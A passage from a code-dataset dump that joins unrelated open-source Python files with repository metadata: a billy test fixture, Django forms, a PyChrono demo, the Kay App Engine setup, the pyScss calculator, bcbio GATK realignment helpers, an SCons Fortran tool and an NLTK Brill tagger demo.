"lower_chamber_title": "Representative",
"upper_chamber_name": "Senate",
"upper_chamber_term": 6,
"upper_chamber_title": "Senator",
"name": "Example State",
"terms": [
{
"name": "T0",
"sessions": [
"S0"
],
"start_year": 2009,
"end_year": 2010
},
{
"name": "T1",
"sessions": [
"S1", "Special1"
],
"start_year": 2011,
"end_year": 2012
},
{
"name": "T2",
"sessions": [
"S2", "Special2"
],
"start_year": 2013,
"end_year": 2014
}
],
"session_details": {
"S0": {"start_date": 1250000000.0, "type": "primary",
"display_name": "Session Zero"},
"S1": {"start_date": 1300000000.0, "type": "primary",
"display_name": "Session One"},
"Special1": {"start_date": 1330000000.0, "type": "special",
"display_name": "Special Session One"},
"S2": {"start_date": 1350000000.0, "type": "primary",
"display_name": "Session Two"},
"Special2": {"start_date": 1360000000.0, "type": "special",
"display_name": "Special Session Two"}
}
}
| mileswwatkins/billy | billy/tests/fixtures/ex/__init__.py | Python | bsd-3-clause | 1,554 |
"""
test_rdf_header.py -- show the rdf_header
Version 0.1 MC 2013-12-27
-- Initial version.
"""
__author__ = "Michael Conlon"
__copyright__ = "Copyright 2013, University of Florida"
__license__ = "BSD 3-Clause license"
__version__ = "0.1"
import vivotools as vt
from datetime import datetime
print datetime.now(),"Start"
print vt.rdf_header()
print datetime.now(),"Finish"
| mconlon17/vivo-1.6-upgrade | tools/test_rdf_header.py | Python | bsd-3-clause | 407 |
from django import forms
from models import FormDataGroup
import re
# On this page, users can upload an xsd file from their laptop
# Then they get redirected to a page where they can download the xsd
class RegisterXForm(forms.Form):
file = forms.FileField()
form_display_name= forms.CharField(max_length=128, label=u'Form Display Name')
class SubmitDataForm(forms.Form):
file = forms.FileField()
class FormDataGroupForm(forms.ModelForm):
"""Form for basic form group data"""
display_name = forms.CharField(widget=forms.TextInput(attrs={'size':'80'}))
view_name = forms.CharField(widget=forms.TextInput(attrs={'size':'40'}))
def clean_view_name(self):
view_name = self.cleaned_data["view_name"]
if not re.match(r"^\w+$", view_name):
raise forms.ValidationError("View name can only contain numbers, letters, and underscores!")
# check that the view name is unique... if it was changed.
if self.instance.id:
if FormDataGroup.objects.get(id=self.instance.id).view_name != view_name and \
FormDataGroup.objects.filter(view_name=view_name).count() > 0:
raise forms.ValidationError("Sorry, view name %s is already in use! Please pick a new one." % view_name)
return self.cleaned_data["view_name"]
class Meta:
model = FormDataGroup
fields = ("display_name", "view_name")
| commtrack/commtrack-core | apps/xformmanager/forms.py | Python | bsd-3-clause | 1,428 |
#------------------------------------------------------------------------------
# Name: pychrono example
# Purpose:
#
# Author: Alessandro Tasora
#
# Created: 1/01/2019
# Copyright: (c) ProjectChrono 2019
#------------------------------------------------------------------------------
print ("First tutorial for PyChrono: vectors, matrices etc.");
# Load the Chrono::Engine core module!
import pychrono as chrono
try:
import numpy as np
from numpy import linalg as LA
except ImportError:
print("You need NumPyto run this demo!")
# Test logging
chrono.GetLog().Bar()
chrono.GetLog() << "result is: " << 11+1.5 << "\n"
chrono.GetLog().Bar()
# Test vectors
my_vect1 = chrono.ChVectorD()
my_vect1.x=5
my_vect1.y=2
my_vect1.z=3
my_vect2 = chrono.ChVectorD(3,4,5)
my_vect4 = my_vect1*10 + my_vect2
my_len = my_vect4.Length()
print ('vect sum =', my_vect1 + my_vect2)
print ('vect cross =', my_vect1 % my_vect2)
print ('vect dot =', my_vect1 ^ my_vect2)
# Test quaternions
my_quat = chrono.ChQuaternionD(1,2,3,4)
my_qconjugate = ~my_quat
print ('quat. conjugate =', my_qconjugate)
print ('quat. dot product=', my_qconjugate ^ my_quat)
print ('quat. product=', my_qconjugate % my_quat)
# Test matrices and NumPy interoperability
mlist = [[1,2,3,4], [5,6,7,8], [9,10,11,12], [13,14,15,16]]
ma = chrono.ChMatrixDynamicD()
ma.SetMatr(mlist) # Create a Matrix from a list. Size is adjusted automatically.
npmat = np.asarray(ma.GetMatr()) # Create a 2D npy array from the list extracted from ChMatrixDynamic
w, v = LA.eig(npmat) # get eigenvalues and eigenvectors using numpy
mb = chrono.ChMatrixDynamicD(4,4)
prod = v * npmat # you can perform linear algebra operations with numpy and then feed results into a ChMatrixDynamicD using SetMatr
mb.SetMatr(v.tolist()) # create a ChMatrixDynamicD from the numpy eigenvectors
mr = chrono.ChMatrix33D()
mr.SetMatr([[1,2,3], [4,5,6], [7,8,9]])
print (mr*my_vect1);
# Test frames -
# create a frame representing a translation and a rotation
# of 20 degrees on X axis
my_frame = chrono.ChFrameD(my_vect2, chrono.Q_from_AngAxis(20*chrono.CH_C_DEG_TO_RAD, chrono.ChVectorD(1,0,0)))
my_vect5 = my_vect1 >> my_frame
# Print the class hierarchy of a chrono class
import inspect
inspect.getmro(chrono.ChStreamOutAsciiFile)
# Use the ChFunction classes
my_funct = chrono.ChFunction_Sine(0,0.5,3)
print ('function f(0.2)=', my_funct.Get_y(0.2) )
# Inherit from the ChFunction, from the Python side,
# (do not forget the __init__ constructor)
class MySquareFunct (chrono.ChFunction):
def __init__(self):
chrono.ChFunction.__init__(self)
def Get_y(self,x):
return x*x
my_funct2 = MySquareFunct()
print ('function f(2) =', my_funct2.Get_y(3) )
print ('function df/dx=', my_funct2.Get_y_dx(3) )
| projectchrono/chrono | src/demos/python/core/demo_CH_coords.py | Python | bsd-3-clause | 2,825 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import azure.cli.command_modules.consumption._help # pylint: disable=unused-import
def load_params(_):
import azure.cli.command_modules.consumption._params # pylint: disable=redefined-outer-name, unused-variable
def load_commands():
import azure.cli.command_modules.consumption.commands # pylint: disable=redefined-outer-name, unused-variable
| QingChenmsft/azure-cli | src/command_modules/azure-cli-consumption/azure/cli/command_modules/consumption/__init__.py | Python | mit | 704 |
# -*- coding: utf-8 -*-
"""
Kay framework.
:Copyright: (c) 2009 Accense Technology, Inc.
Takashi Matsuo <tmatsuo@candit.jp>,
Ian Lewis <IanMLewis@gmail.com>
All rights reserved.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import logging
import settings
__version__ = "3.0.0"
__version_info__ = (3, 0, 0, 'final', 0)
KAY_DIR = os.path.abspath(os.path.dirname(__file__))
LIB_DIR = os.path.join(KAY_DIR, 'lib')
PROJECT_DIR = os.path.abspath(os.path.dirname(settings.__file__))
PROJECT_LIB_DIR = os.path.join(PROJECT_DIR, 'lib')
def setup_env(manage_py_env=False):
"""Configures app engine environment for command-line apps."""
# Try to import the appengine code from the system path.
try:
from google.appengine.api import apiproxy_stub_map
except ImportError, e:
# Not on the system path. Build a list of alternative paths where it
# may be. First look within the project for a local copy, then look for
# where the Mac OS SDK installs it.
paths = [os.path.join(PROJECT_DIR, '.google_appengine'),
'/usr/local/google_appengine']
for path in os.environ.get('PATH', '').replace(';', ':').split(':'):
path = path.rstrip(os.sep)
if path.endswith('google_appengine'):
paths.append(path)
if os.name in ('nt', 'dos'):
prefix = '%(PROGRAMFILES)s' % os.environ
paths.append(prefix + r'\Google\google_appengine')
# Loop through all possible paths and look for the SDK dir.
SDK_PATH = None
for sdk_path in paths:
sdk_path = os.path.realpath(sdk_path)
if os.path.exists(sdk_path):
SDK_PATH = sdk_path
break
if SDK_PATH is None:
# The SDK could not be found in any known location.
sys.stderr.write('The Google App Engine SDK could not be found!\n'
'Please visit http://kay-docs.shehas.net/'
' for installation instructions.\n')
sys.exit(1)
# Add the SDK and the libraries within it to the system path.
SDK_PATH = os.path.realpath(SDK_PATH)
# if SDK_PATH points to a file, it could be a zip file.
if os.path.isfile(SDK_PATH):
import zipfile
gae_zip = zipfile.ZipFile(SDK_PATH)
lib_prefix = os.path.join('google_appengine', 'lib')
lib = os.path.join(SDK_PATH, lib_prefix)
pkg_names = []
# add all packages archived under lib in SDK_PATH zip.
for filename in sorted(e.filename for e in gae_zip.filelist):
# package should have __init__.py
if (filename.startswith(lib_prefix) and
filename.endswith('__init__.py')):
pkg_path = filename.replace(os.sep+'__init__.py', '')
# True package root should have __init__.py in upper directory,
# thus we can treat only the shortest unique path as package root.
for pkg_name in pkg_names:
if pkg_path.startswith(pkg_name):
break
else:
pkg_names.append(pkg_path)
# insert populated EXTRA_PATHS into sys.path.
EXTRA_PATHS = ([os.path.dirname(os.path.join(SDK_PATH, pkg_name))
for pkg_name in pkg_names]
+ [os.path.join(SDK_PATH, 'google_appengine')])
sys.path = EXTRA_PATHS + sys.path
# tweak dev_appserver so to make zipimport and templates work well.
from google.appengine.tools import dev_appserver
# make GAE SDK to grant opening library zip.
dev_appserver.FakeFile.ALLOWED_FILES.add(SDK_PATH)
template_dir = 'google_appengine/templates/'
dev_appserver.ApplicationLoggingHandler.InitializeTemplates(
gae_zip.read(template_dir+dev_appserver.HEADER_TEMPLATE),
gae_zip.read(template_dir+dev_appserver.SCRIPT_TEMPLATE),
gae_zip.read(template_dir+dev_appserver.MIDDLE_TEMPLATE),
gae_zip.read(template_dir+dev_appserver.FOOTER_TEMPLATE))
# ... else it could be a directory.
else:
sys.path = [SDK_PATH] + sys.path
from appcfg import EXTRA_PATHS as appcfg_EXTRA_PATHS
from appcfg import GOOGLE_SQL_EXTRA_PATHS as appcfg_SQL_EXTRA_PATHS
sys.path = sys.path + appcfg_EXTRA_PATHS + appcfg_SQL_EXTRA_PATHS
# corresponds with another google package
if sys.modules.has_key('google'):
del sys.modules['google']
from google.appengine.api import apiproxy_stub_map
setup()
if not manage_py_env:
return
print 'Running on Kay-%s' % __version__
def setup():
setup_syspath()
def setup_syspath():
if not PROJECT_DIR in sys.path:
sys.path = [PROJECT_DIR] + sys.path
if not LIB_DIR in sys.path:
sys.path = [LIB_DIR] + sys.path
if not PROJECT_LIB_DIR in sys.path:
sys.path = [PROJECT_LIB_DIR] + sys.path
| yosukesuzuki/kay-template | project/kay/__init__.py | Python | mit | 4,770 |
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import sys
import logging
from warnings import warn
import six
from scss.ast import Literal
from scss.cssdefs import _expr_glob_re, _interpolate_re
from scss.errors import SassError, SassEvaluationError, SassParseError
from scss.grammar.expression import SassExpression, SassExpressionScanner
from scss.rule import Namespace
from scss.types import String
from scss.types import Value
from scss.util import dequote
log = logging.getLogger(__name__)
class Calculator(object):
"""Expression evaluator."""
ast_cache = {}
def __init__(
self, namespace=None,
ignore_parse_errors=False,
undefined_variables_fatal=True,
):
if namespace is None:
self.namespace = Namespace()
else:
self.namespace = namespace
self.ignore_parse_errors = ignore_parse_errors
self.undefined_variables_fatal = undefined_variables_fatal
def _pound_substitute(self, result):
expr = result.group(1)
value = self.evaluate_expression(expr)
if value is None:
return self.apply_vars(expr)
elif value.is_null:
return ""
else:
return dequote(value.render())
def do_glob_math(self, cont):
"""Performs #{}-interpolation. The result is always treated as a fixed
syntactic unit and will not be re-evaluated.
"""
# TODO that's a lie! this should be in the parser for most cases.
if not isinstance(cont, six.string_types):
warn(FutureWarning(
"do_glob_math was passed a non-string {0!r} "
"-- this will no longer be supported in pyScss 2.0"
.format(cont)
))
cont = six.text_type(cont)
if '#{' not in cont:
return cont
cont = _expr_glob_re.sub(self._pound_substitute, cont)
return cont
def apply_vars(self, cont):
# TODO this is very complicated. it should go away once everything
# valid is actually parseable.
if isinstance(cont, six.string_types) and '$' in cont:
try:
# Optimization: the full cont is a variable in the context,
cont = self.namespace.variable(cont)
except KeyError:
# Interpolate variables:
def _av(m):
v = None
n = m.group(2)
try:
v = self.namespace.variable(n)
except KeyError:
if self.undefined_variables_fatal:
raise SyntaxError("Undefined variable: '%s'." % n)
else:
log.error("Undefined variable '%s'", n, extra={'stack': True})
return n
else:
if v:
if not isinstance(v, Value):
raise TypeError(
"Somehow got a variable {0!r} "
"with a non-Sass value: {1!r}"
.format(n, v)
)
v = v.render()
# TODO this used to test for _dequote
if m.group(1):
v = dequote(v)
else:
v = m.group(0)
return v
cont = _interpolate_re.sub(_av, cont)
else:
# Variable succeeded, so we need to render it
cont = cont.render()
# TODO this is surprising and shouldn't be here
cont = self.do_glob_math(cont)
return cont
def calculate(self, expression, divide=False):
result = self.evaluate_expression(expression, divide=divide)
if result is None:
return String.unquoted(self.apply_vars(expression))
return result
# TODO only used by magic-import...?
def interpolate(self, var):
value = self.namespace.variable(var)
if var != value and isinstance(value, six.string_types):
_vi = self.evaluate_expression(value)
if _vi is not None:
value = _vi
return value
def evaluate_expression(self, expr, divide=False):
try:
ast = self.parse_expression(expr)
except SassError as e:
if self.ignore_parse_errors:
return None
raise
try:
return ast.evaluate(self, divide=divide)
except Exception as e:
six.reraise(SassEvaluationError, SassEvaluationError(e, expression=expr), sys.exc_info()[2])
def parse_expression(self, expr, target='goal'):
if isinstance(expr, six.text_type):
# OK
pass
elif isinstance(expr, six.binary_type):
# Dubious
warn(FutureWarning(
"parse_expression was passed binary data {0!r} "
"-- this will no longer be supported in pyScss 2.0"
.format(expr)
))
# Don't guess an encoding; you reap what you sow
expr = six.text_type(expr)
else:
raise TypeError("Expected string, got %r" % (expr,))
key = (target, expr)
if key in self.ast_cache:
return self.ast_cache[key]
try:
parser = SassExpression(SassExpressionScanner(expr))
ast = getattr(parser, target)()
except SyntaxError as e:
raise SassParseError(e, expression=expr, expression_pos=parser._char_pos)
self.ast_cache[key] = ast
return ast
def parse_interpolations(self, string):
"""Parse a string for interpolations, but don't treat anything else as
Sass syntax. Returns an AST node.
"""
# Shortcut: if there are no #s in the string in the first place, it
# must not have any interpolations, right?
if '#' not in string:
return Literal(String.unquoted(string))
return self.parse_expression(string, 'goal_interpolated_literal')
def parse_vars_and_interpolations(self, string):
"""Parse a string for variables and interpolations, but don't treat
anything else as Sass syntax. Returns an AST node.
"""
# Shortcut: if there are no #s or $s in the string in the first place,
# it must not have anything of interest.
if '#' not in string and '$' not in string:
return Literal(String.unquoted(string))
return self.parse_expression(
string, 'goal_interpolated_literal_with_vars')
__all__ = ('Calculator',)
| cpfair/pyScss | scss/calculator.py | Python | mit | 6,935 |
"""Perform realignment of BAM files around indels using the GATK toolkit.
"""
import os
import shutil
from contextlib import closing
import pysam
from bcbio import bam, broad
from bcbio.bam import ref
from bcbio.log import logger
from bcbio.utils import file_exists
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.pipeline.shared import subset_bam_by_region, subset_variant_regions
from bcbio.provenance import do
# ## GATK realignment
def gatk_realigner_targets(runner, align_bam, ref_file, config, dbsnp=None,
region=None, out_file=None, deep_coverage=False,
variant_regions=None, known_vrns=None):
"""Generate a list of interval regions for realignment around indels.
"""
if not known_vrns:
known_vrns = {}
if out_file:
out_file = "%s.intervals" % os.path.splitext(out_file)[0]
else:
out_file = "%s-realign.intervals" % os.path.splitext(align_bam)[0]
# check only for file existence; interval files can be empty after running
# on small chromosomes, so don't rerun in those cases
if not os.path.exists(out_file):
with file_transaction(config, out_file) as tx_out_file:
logger.debug("GATK RealignerTargetCreator: %s %s" %
(os.path.basename(align_bam), region))
params = ["-T", "RealignerTargetCreator",
"-I", align_bam,
"-R", ref_file,
"-o", tx_out_file,
"-l", "INFO",
]
region = subset_variant_regions(variant_regions, region, tx_out_file)
if region:
params += ["-L", region, "--interval_set_rule", "INTERSECTION"]
if known_vrns.get("train_indels"):
params += ["--known", known_vrns["train_indels"]]
if deep_coverage:
params += ["--mismatchFraction", "0.30",
"--maxIntervalSize", "650"]
runner.run_gatk(params, memscale={"direction": "decrease", "magnitude": 2})
return out_file
def gatk_indel_realignment_cl(runner, align_bam, ref_file, intervals,
tmp_dir, region=None, deep_coverage=False,
known_vrns=None):
"""Prepare input arguments for GATK indel realignment.
"""
if not known_vrns:
known_vrns = {}
params = ["-T", "IndelRealigner",
"-I", align_bam,
"-R", ref_file,
"-targetIntervals", intervals,
]
if region:
params += ["-L", region]
if known_vrns.get("train_indels"):
params += ["--knownAlleles", known_vrns["train_indels"]]
if deep_coverage:
params += ["--maxReadsInMemory", "300000",
"--maxReadsForRealignment", str(int(5e5)),
"--maxReadsForConsensuses", "500",
"--maxConsensuses", "100"]
return runner.cl_gatk(params, tmp_dir)
# ## Utilities
def has_aligned_reads(align_bam, region=None):
"""Check if the aligned BAM file has any reads in the region.
region can be a chromosome string ("chr22"),
a tuple region (("chr22", 1, 100)) or a file of regions.
"""
import pybedtools
if region is not None:
if isinstance(region, basestring) and os.path.isfile(region):
regions = [tuple(r) for r in pybedtools.BedTool(region)]
else:
regions = [region]
with closing(pysam.Samfile(align_bam, "rb")) as cur_bam:
if region is not None:
for region in regions:
if isinstance(region, basestring):
for item in cur_bam.fetch(str(region)):
return True
else:
for item in cur_bam.fetch(str(region[0]), int(region[1]), int(region[2])):
return True
else:
for item in cur_bam:
if not item.is_unmapped:
return True
return False
| Cyberbio-Lab/bcbio-nextgen | bcbio/variation/realign.py | Python | mit | 4,077 |
"""SCons.Tool.sunf95
Tool-specific initialization for sunf95, the Sun Studio F95 compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunf95.py 4720 2010/03/24 03:14:11 jars"
import SCons.Util
from FortranCommon import add_all_to_env
compilers = ['sunf95', 'f95']
def generate(env):
"""Add Builders and construction variables for sunf95 to an
Environment."""
add_all_to_env(env)
fcomp = env.Detect(compilers) or 'f95'
env['FORTRAN'] = fcomp
env['F95'] = fcomp
env['SHFORTRAN'] = '$FORTRAN'
env['SHF95'] = '$F95'
env['SHFORTRANFLAGS'] = SCons.Util.CLVar('$FORTRANFLAGS -KPIC')
env['SHF95FLAGS'] = SCons.Util.CLVar('$F95FLAGS -KPIC')
def exists(env):
return env.Detect(compilers)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| qewerty/moto.old | tools/scons/engine/SCons/Tool/sunf95.py | Python | gpl-2.0 | 2,167 |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: Transformation-based learning
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Marcus Uneson <marcus.uneson@gmail.com>
# based on previous (nltk2) version by
# Christopher Maloof, Edward Loper, Steven Bird
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import print_function, absolute_import, division
import os
import pickle
import random
import time
from nltk.corpus import treebank
from nltk.tbl import error_list, Template
from nltk.tag.brill import Word, Pos
from nltk.tag import BrillTaggerTrainer, RegexpTagger, UnigramTagger
def demo():
"""
Run a demo with defaults. See source comments for details,
or docstrings of any of the more specific demo_* functions.
"""
postag()
def demo_repr_rule_format():
"""
Exemplify repr(Rule) (see also str(Rule) and Rule.format("verbose"))
"""
postag(ruleformat="repr")
def demo_str_rule_format():
"""
Exemplify repr(Rule) (see also str(Rule) and Rule.format("verbose"))
"""
postag(ruleformat="str")
def demo_verbose_rule_format():
"""
Exemplify Rule.format("verbose")
"""
postag(ruleformat="verbose")
def demo_multiposition_feature():
"""
The feature/s of a template takes a list of positions
relative to the current word where the feature should be
looked for, conceptually joined by logical OR. For instance,
Pos([-1, 1]), given a value V, will hold whenever V is found
one step to the left and/or one step to the right.
For contiguous ranges, a 2-arg form giving inclusive end
points can also be used: Pos(-3, -1) is the same as the arg
below.
"""
postag(templates=[Template(Pos([-3,-2,-1]))])
def demo_multifeature_template():
"""
Templates can have more than a single feature.
"""
postag(templates=[Template(Word([0]), Pos([-2,-1]))])
def demo_template_statistics():
"""
Show aggregate statistics per template. Little used templates are
candidates for deletion, much used templates may possibly be refined.
Deleting unused templates is mostly about saving time and/or space:
training is basically O(T) in the number of templates T
(also in terms of memory usage, which often will be the limiting factor).
"""
postag(incremental_stats=True, template_stats=True)
def demo_generated_templates():
"""
Template.expand and Feature.expand are class methods facilitating
generating large amounts of templates. See their documentation for
details.
Note: training with 500 templates can easily fill all available
even on relatively small corpora
"""
wordtpls = Word.expand([-1,0,1], [1,2], excludezero=False)
tagtpls = Pos.expand([-2,-1,0,1], [1,2], excludezero=True)
templates = list(Template.expand([wordtpls, tagtpls], combinations=(1,3)))
print("Generated {0} templates for transformation-based learning".format(len(templates)))
postag(templates=templates, incremental_stats=True, template_stats=True)
def demo_learning_curve():
"""
Plot a learning curve -- the contribution on tagging accuracy of
the individual rules.
Note: requires matplotlib
"""
postag(incremental_stats=True, separate_baseline_data=True, learning_curve_output="learningcurve.png")
def demo_error_analysis():
"""
Writes a file with context for each erroneous word after tagging testing data
"""
postag(error_output="errors.txt")
def demo_serialize_tagger():
"""
Serializes the learned tagger to a file in pickle format; reloads it
and validates the process.
"""
postag(serialize_output="tagger.pcl")
def demo_high_accuracy_rules():
"""
Discard rules with low accuracy. This may hurt performance a bit,
but will often produce rules which are more interesting read to a human.
"""
postag(num_sents=3000, min_acc=0.96, min_score=10)
def postag(
templates=None,
tagged_data=None,
num_sents=1000,
max_rules=300,
min_score=3,
min_acc=None,
train=0.8,
trace=3,
randomize=False,
ruleformat="str",
incremental_stats=False,
template_stats=False,
error_output=None,
serialize_output=None,
learning_curve_output=None,
learning_curve_take=300,
baseline_backoff_tagger=None,
separate_baseline_data=False,
cache_baseline_tagger=None):
"""
Brill Tagger Demonstration
:param templates: how many sentences of training and testing data to use
:type templates: list of Template
:param tagged_data: maximum number of rule instances to create
:type tagged_data: C{int}
:param num_sents: how many sentences of training and testing data to use
:type num_sents: C{int}
:param max_rules: maximum number of rule instances to create
:type max_rules: C{int}
:param min_score: the minimum score for a rule in order for it to be considered
:type min_score: C{int}
:param min_acc: the minimum score for a rule in order for it to be considered
:type min_acc: C{float}
:param train: the fraction of the the corpus to be used for training (1=all)
:type train: C{float}
:param trace: the level of diagnostic tracing output to produce (0-4)
:type trace: C{int}
:param randomize: whether the training data should be a random subset of the corpus
:type randomize: C{bool}
:param ruleformat: rule output format, one of "str", "repr", "verbose"
:type ruleformat: C{str}
:param incremental_stats: if true, will tag incrementally and collect stats for each rule (rather slow)
:type incremental_stats: C{bool}
:param template_stats: if true, will print per-template statistics collected in training and (optionally) testing
:type template_stats: C{bool}
:param error_output: the file where errors will be saved
:type error_output: C{string}
:param serialize_output: the file where the learned tbl tagger will be saved
:type serialize_output: C{string}
:param learning_curve_output: filename of plot of learning curve(s) (train and also test, if available)
:type learning_curve_output: C{string}
:param learning_curve_take: how many rules plotted
:type learning_curve_take: C{int}
:param baseline_backoff_tagger: the file where rules will be saved
:type baseline_backoff_tagger: tagger
:param separate_baseline_data: use a fraction of the training data exclusively for training baseline
:type separate_baseline_data: C{bool}
:param cache_baseline_tagger: cache baseline tagger to this file (only interesting as a temporary workaround to get
deterministic output from the baseline unigram tagger between python versions)
:type cache_baseline_tagger: C{string}
Note on separate_baseline_data: if True, reuse training data both for baseline and rule learner. This
is fast and fine for a demo, but is likely to generalize worse on unseen data.
Also cannot be sensibly used for learning curves on training data (the baseline will be artificially high).
"""
# defaults
baseline_backoff_tagger = baseline_backoff_tagger or REGEXP_TAGGER
if templates is None:
from nltk.tag.brill import describe_template_sets, brill24
# some pre-built template sets taken from typical systems or publications are
# available. Print a list with describe_template_sets()
# for instance:
templates = brill24()
(training_data, baseline_data, gold_data, testing_data) = \
_demo_prepare_data(tagged_data, train, num_sents, randomize, separate_baseline_data)
# creating (or reloading from cache) a baseline tagger (unigram tagger)
# this is just a mechanism for getting deterministic output from the baseline between
# python versions
if cache_baseline_tagger:
if not os.path.exists(cache_baseline_tagger):
baseline_tagger = UnigramTagger(baseline_data, backoff=baseline_backoff_tagger)
with open(cache_baseline_tagger, 'w') as print_rules:
pickle.dump(baseline_tagger, print_rules)
print("Trained baseline tagger, pickled it to {0}".format(cache_baseline_tagger))
with open(cache_baseline_tagger, "r") as print_rules:
baseline_tagger= pickle.load(print_rules)
print("Reloaded pickled tagger from {0}".format(cache_baseline_tagger))
else:
baseline_tagger = UnigramTagger(baseline_data, backoff=baseline_backoff_tagger)
print("Trained baseline tagger")
if gold_data:
print(" Accuracy on test set: {0:0.4f}".format(baseline_tagger.evaluate(gold_data)))
# creating a Brill tagger
tbrill = time.time()
trainer = BrillTaggerTrainer(baseline_tagger, templates, trace, ruleformat=ruleformat)
print("Training tbl tagger...")
brill_tagger = trainer.train(training_data, max_rules, min_score, min_acc)
print("Trained tbl tagger in {0:0.2f} seconds".format(time.time() - tbrill))
if gold_data:
print(" Accuracy on test set: %.4f" % brill_tagger.evaluate(gold_data))
# printing the learned rules, if learned silently
if trace == 1:
print("\nLearned rules: ")
for (ruleno, rule) in enumerate(brill_tagger.rules(),1):
print("{0:4d} {1:s}".format(ruleno, rule.format(ruleformat)))
# printing template statistics (optionally including comparison with the training data)
# note: if not separate_baseline_data, then baseline accuracy will be artificially high
if incremental_stats:
print("Incrementally tagging the test data, collecting individual rule statistics")
(taggedtest, teststats) = brill_tagger.batch_tag_incremental(testing_data, gold_data)
print(" Rule statistics collected")
if not separate_baseline_data:
print("WARNING: train_stats asked for separate_baseline_data=True; the baseline "
"will be artificially high")
trainstats = brill_tagger.train_stats()
if template_stats:
brill_tagger.print_template_statistics(teststats)
if learning_curve_output:
_demo_plot(learning_curve_output, teststats, trainstats, take=learning_curve_take)
print("Wrote plot of learning curve to {0}".format(learning_curve_output))
else:
print("Tagging the test data")
taggedtest = brill_tagger.tag_sents(testing_data)
if template_stats:
brill_tagger.print_template_statistics()
# writing error analysis to file
if error_output is not None:
with open(error_output, 'w') as f:
f.write('Errors for Brill Tagger %r\n\n' % serialize_output)
f.write(u'\n'.join(error_list(gold_data, taggedtest)).encode('utf-8') + '\n')
print("Wrote tagger errors including context to {0}".format(error_output))
# serializing the tagger to a pickle file and reloading (just to see it works)
if serialize_output is not None:
taggedtest = brill_tagger.tag_sents(testing_data)
with open(serialize_output, 'w') as print_rules:
pickle.dump(brill_tagger, print_rules)
print("Wrote pickled tagger to {0}".format(serialize_output))
with open(serialize_output, "r") as print_rules:
brill_tagger_reloaded = pickle.load(print_rules)
print("Reloaded pickled tagger from {0}".format(serialize_output))
taggedtest_reloaded = brill_tagger.tag_sents(testing_data)
if taggedtest == taggedtest_reloaded:
print("Reloaded tagger tried on test set, results identical")
else:
print("PROBLEM: Reloaded tagger gave different results on test set")
def _demo_prepare_data(tagged_data, train, num_sents, randomize, separate_baseline_data):
# train is the proportion of data used in training; the rest is reserved
# for testing.
if tagged_data is None:
print("Loading tagged data from treebank... ")
tagged_data = treebank.tagged_sents()
if num_sents is None or len(tagged_data) <= num_sents:
num_sents = len(tagged_data)
if randomize:
random.seed(len(tagged_data))
random.shuffle(tagged_data)
cutoff = int(num_sents * train)
training_data = tagged_data[:cutoff]
gold_data = tagged_data[cutoff:num_sents]
testing_data = [[t[0] for t in sent] for sent in gold_data]
if not separate_baseline_data:
baseline_data = training_data
else:
bl_cutoff = len(training_data) // 3
(baseline_data, training_data) = (training_data[:bl_cutoff], training_data[bl_cutoff:])
(trainseqs, traintokens) = corpus_size(training_data)
(testseqs, testtokens) = corpus_size(testing_data)
(bltrainseqs, bltraintokens) = corpus_size(baseline_data)
print("Read testing data ({0:d} sents/{1:d} wds)".format(testseqs, testtokens))
print("Read training data ({0:d} sents/{1:d} wds)".format(trainseqs, traintokens))
print("Read baseline data ({0:d} sents/{1:d} wds) {2:s}".format(
bltrainseqs, bltraintokens, "" if separate_baseline_data else "[reused the training set]"))
return (training_data, baseline_data, gold_data, testing_data)
def _demo_plot(learning_curve_output, teststats, trainstats=None, take=None):
testcurve = [teststats['initialerrors']]
for rulescore in teststats['rulescores']:
testcurve.append(testcurve[-1] - rulescore)
testcurve = [1 - x/teststats['tokencount'] for x in testcurve[:take]]
traincurve = [trainstats['initialerrors']]
for rulescore in trainstats['rulescores']:
traincurve.append(traincurve[-1] - rulescore)
traincurve = [1 - x/trainstats['tokencount'] for x in traincurve[:take]]
import matplotlib.pyplot as plt
r = list(range(len(testcurve)))
plt.plot(r, testcurve, r, traincurve)
plt.axis([None, None, None, 1.0])
plt.savefig(learning_curve_output)
NN_CD_TAGGER = RegexpTagger(
[(r'^-?[0-9]+(.[0-9]+)?$', 'CD'),
(r'.*', 'NN')])
REGEXP_TAGGER = RegexpTagger(
[(r'^-?[0-9]+(.[0-9]+)?$', 'CD'), # cardinal numbers
(r'(The|the|A|a|An|an)$', 'AT'), # articles
(r'.*able$', 'JJ'), # adjectives
(r'.*ness$', 'NN'), # nouns formed from adjectives
(r'.*ly$', 'RB'), # adverbs
(r'.*s$', 'NNS'), # plural nouns
(r'.*ing$', 'VBG'), # gerunds
(r'.*ed$', 'VBD'), # past tense verbs
(r'.*', 'NN') # nouns (default)
])
def corpus_size(seqs):
return (len(seqs), sum(len(x) for x in seqs))
if __name__ == '__main__':
